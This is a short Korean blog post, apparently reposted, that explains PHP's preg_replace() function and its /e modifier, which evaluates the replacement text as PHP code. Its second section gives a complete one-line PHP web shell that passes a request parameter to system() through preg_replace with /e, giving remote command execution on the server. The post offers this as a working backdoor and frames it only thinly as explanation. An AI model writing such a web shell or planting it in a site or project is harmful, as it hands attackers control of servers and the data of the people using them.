preg_replace() 함수를 이용한 PHP WebShell

[출처] preg_replace() 함수를 이용한 PHP WebShell|작성자 코로문

http://blog.naver.com/koromoon/220090328586

( 1 ) preg_replace() 함수

 

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit [, int &$count ]] )

 

정규 표현식 검색과 치환을 수행하는 함수로 subject 를 검색하여 매치된 pattern 을 replacement 로 치환함.

참고로 patten 인자의 /e 옵션은 preg_replace()가 replacement 인자로 변환을 하고 PHP 코드로 취급하도록 함. 

 

참고 사이트 : 

http://php.net/manual/kr/function.preg-replace.php 

 

 

 

( 2 ) preg_replace() 함수를 이용한 PHP WebShell

 

<? $command = $_REQUEST['c']; $backdoor = "system($command)"; preg_replace("/aaa/e", $backdoor, "aaa"); ?>

< preg_replace() 함수를 이용한 PHP WebShell >

[출처] preg_replace() 함수를 이용한 PHP WebShell|작성자 코로문